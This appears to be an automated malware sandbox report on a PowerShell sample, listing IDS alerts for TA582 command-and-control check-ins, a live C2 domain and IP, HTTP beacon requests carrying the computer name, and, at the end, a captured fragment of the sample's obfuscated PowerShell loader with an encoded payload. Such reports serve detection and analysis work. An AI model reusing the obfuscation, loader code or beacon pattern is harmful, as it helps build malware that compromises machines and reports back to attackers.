Click to jump to signature section
Source: | Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.137016391574.000001CF29DC9000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb7u source: powershell.exe, 00000000.00000002.137052660360.000001CF441A9000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.137049725010.000001CF43E3E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.137052660360.000001CF441CF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.137053533993.000001CF444F6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbgStrings source: powershell.exe, 00000000.00000002.137051162289.000001CF440D6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.137053533993.000001CF444F6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.137052660360.000001CF441A9000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.137016391574.000001CF29DC9000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdbP source: powershell.exe, 00000000.00000002.137051162289.000001CF4413C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 6?lib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.137051162289.000001CF440D6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32X source: powershell.exe, 00000000.00000002.137016391574.000001CF29DC9000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdby|001.8Mod source: powershell.exe, 00000000.00000002.137053533993.000001CF444F6000.00000004.00000020.00020000.00000000.sdmp |
Source: Network traffic | Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49759 -> 45.61.136.138:80 |
Source: Network traffic | Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49760 -> 142.250.65.196:80 |
Source: Network traffic | Suricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.11.20:49759 -> 45.61.136.138:80 |
Source: Network traffic | Suricata IDS: 2859405 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.20:55684 -> 1.1.1.1:53 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvGbwS4-XkOznBE-Ob5uLQbryjcrlFpigL16PI09sJUHfqEGz8Sof0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=cEoIAxjMoZ6MoW68jg49qCvrRMa0ViSx6xN20jBzhJeiEz3tcizlILgzAcNWZYjCzEeOfczwUdLkmSnraGstbyPWvKRY4BLH6ZxyeYSuz-t1QxzbHSKelk9W2dJ3fRsRHkE98yh2r97s7ODfTI2YXocag3sXOqL8kezGUaPUsHBEfBoGbcxKg7NugFxmHmacy3uh |
Source: global traffic | HTTP traffic detected: GET /fw59ib1u2yhtr.php?id=computer&key=64956393081&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvGbwS4-XkOznBE-Ob5uLQbryjcrlFpigL16PI09sJUHfqEGz8Sof0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=cEoIAxjMoZ6MoW68jg49qCvrRMa0ViSx6xN20jBzhJeiEz3tcizlILgzAcNWZYjCzEeOfczwUdLkmSnraGstbyPWvKRY4BLH6ZxyeYSuz-t1QxzbHSKelk9W2dJ3fRsRHkE98yh2r97s7ODfTI2YXocag3sXOqL8kezGUaPUsHBEfBoGbcxKg7NugFxmHmacy3uh |
Source: global traffic | HTTP traffic detected: GET /fw59ib1u2yhtr.php?id=computer&key=64956393081&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvGbwS4-XkOznBE-Ob5uLQbryjcrlFpigL16PI09sJUHfqEGz8Sof0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=cEoIAxjMoZ6MoW68jg49qCvrRMa0ViSx6xN20jBzhJeiEz3tcizlILgzAcNWZYjCzEeOfczwUdLkmSnraGstbyPWvKRY4BLH6ZxyeYSuz-t1QxzbHSKelk9W2dJ3fRsRHkE98yh2r97s7ODfTI2YXocag3sXOqL8kezGUaPUsHBEfBoGbcxKg7NugFxmHmacy3uh |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2D0C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$jm9lqy6w1pihvt8/$6lmkrt5pui8sed3.php? |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$jm9lqy6w1pihvt8/$6lmkrt5pui8sed3.php?id=$env:computername&key=$ihwdqrvefno&s=527 |
Source: powershell.exe, 00000000.00000002.137049725010.000001CF43E4C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.137049725010.000001CF43E4C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.137050940017.000001CF43F10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr) |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CEA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137017490133.000001CF2CF26000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CEA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/fw59ib1u2yhtr.php?id=computer&key=64956393081&s=527 |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CEA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/fw59ib1u2yhtr.php?id=computer&key=64956393081&s=527p |
Source: powershell.exe, 00000000.00000002.137042985676.000001CF3BD51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BCE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CF26000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2D260000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CF42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvGbwS4-XkOznBE-Ob5uLQbryjcrlFpigL16PI09sJUHfq |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CF26000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvG |
Source: powershell.exe, 00000000.00000002.137049725010.000001CF43E4C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BCE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.137042985676.000001CF3BD51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.137042985676.000001CF3BD51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.137042985676.000001CF3BD51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CF26000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2DEFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.137042985676.000001CF3BD51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.137049725010.000001CF43E4C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CF42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137017490133.000001CF2CF26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137017490133.000001CF2CF54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:304:WilStaging_02 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $byjaog1hx3pi5uz.(([system.String]::new(@((474896/7088),(-2720+(393509/139)),(10201-10089),(1238435/(849505/(-2478+(7296289/2849)))),(-6633+(-849+7566)),(901-(6387940/(3009+(10729-5652))))))))( $zx9t1mu8fpeg67s ) $byjaog1hx3pi5uz.((-join (@((23450/(-5688+(-930+6968))),(109512/(6924606/6829)),(-1933+2044),(-5232+5347),(-4390+4491))| ForEach-Object { [char]$_ })))()$9sx3bywr4jlhq85.((-join (@((6874-6807),(-1173+1281),(3344-(10846-(9554315/1255))),(-4493+(42425856/(10551-(7439-6095)))),(272902/(7961-5259)))| ForEach-Object { [char]$_ })))()[byte[]] $icvgeypqar70438 = $zx9t1mu8fpeg67s.(([char[]]@((1286-1202),(4496-(14220555/3243)),(-6339+6404),(8874-8760),(-2120+2234),(104663/1079),(932184/7704)) -join ''))() $8u1xpshejf069z5=$icvgeypqar70438 return $8u1xpshejf069z5}[System.Text.Encoding]::ascii.((-join (@((515957/(51617501/(62506400/(16776-(19820360/(-5408+7893)))))),(509343/(792+4251)),(-2856+(9937-(40501475/5815))),(-7969+(39575580/(4761+154))),(2511-2395),(-479+593),(391440/(6011-2283)),(-8208+(17689-(12525-(585+2569)))),(649312/6304))| ForEach-Object { [char]$_ })))((dx36iuwaqersg5yt2oj8k4vpcml "Jug9NGF0enZ2N5utZAwpYxPy1VWyyFdRCdgGXdSOBgkqF4TxH/ie2GOt8SpqcXb4GugjcSugMuClwUn+yrXclUj9yFNW6fP7I22Oe/4njwgmYtkmzt2Fy/0IDQeH39rTkp7Q5yYjFcgJxcTN25dRyxeLgoOTy9zDyLbQVZ6CioaWx+vUx4bw57KZBZp9xEmPwZDgx3bbdY2ZiCn/N8xq2X8Ylc6+tNvmlh1JQblLBYaF9MPI3BTqSJShn4j12qmH4vtP+Rj9S4yvytstWgvmApSiHenB6MdoUlrxhrWYeAn5kuBIApit/vXOdYw0GPvCtI1n1w5Bvc8WSoHJpzBtgqiRrBUZ/ODm4SFfWrjyoK2eSu3cTeaMzLPTaOyRGP/Er5u/Q0/MA63JGMUHrqVIicr1RQQ56Y0przFI6YyyTwS/WuiXY18Cwds3Vtvlj1pK0QLr4vmMw4G3jtQLrgywuxoZBwHO82pMSTA4aJVKpZqvGuhEBMLWn8yD2pnDrrmupz5KyaxDlil4G4EesExeOViguqQhe+OWWSwpSIVVMJnITsFitBKIaW4YL4G7QQjUIcWYG+TZFwj7bt1TLE6Q/lOsDJsffkufABbu6TWSmLDLxh1f4/X1lSWTli8OP0jrz4nH6APBtfRZsqvEJftbayISH68DobN0roPuICpdGVkOEyRLdl3RcXokHDS3XNOqwJiex6q5ZYnK7LhOGvMD71jwII7/b+/XALfZE1ej98Ub8vmIn8HuUvxevaaga3yHvPbfIFXJo/vBfKU/k9NQEdSgJ1D4S0QUfk4B0aE7EOjKVAyvZEITfjqsTM06FJSWr9GG3EtFNdM0MpNGvIQTbjqnJU/vCzEzbdhuCZYqEMGtfR90QvOhk4uyE7o2Q6/pfx6UMv/0epqEtCLKnZBEqCjDvu8LqZA22LdM1DlXtetAIO43e/dKXSp9EwvwqAFOgNnLw9KzNZHNCsxPxpuFzQgXG4C//sldR4LSa70Pj7WL1sfi1KrUzpQKjaVlwMjYnkAhWIeJsfsPyf3XnvDGk14IgYSI+sj43LZBjrgaI1Szon891z8HOzg3q1ikJ0QWBqvPpsaq8BPRYSpMks/78y9ERqpOjeiuBBiNzYT3ARjFBC0DTuFK7uNgG7yvguuNtNpRNttZTyCX4GvaM80PRELBrOXZM3V9giY8YSLYvioamzyxG0y3mY1DbASA09rT7P56a3t9azQDjqQ7suOR+L3hWezFFsMJyNPaCUSLRw+A29TBRZzW77LZm5oNCAlu9gbGbZlOjWb7UTgO |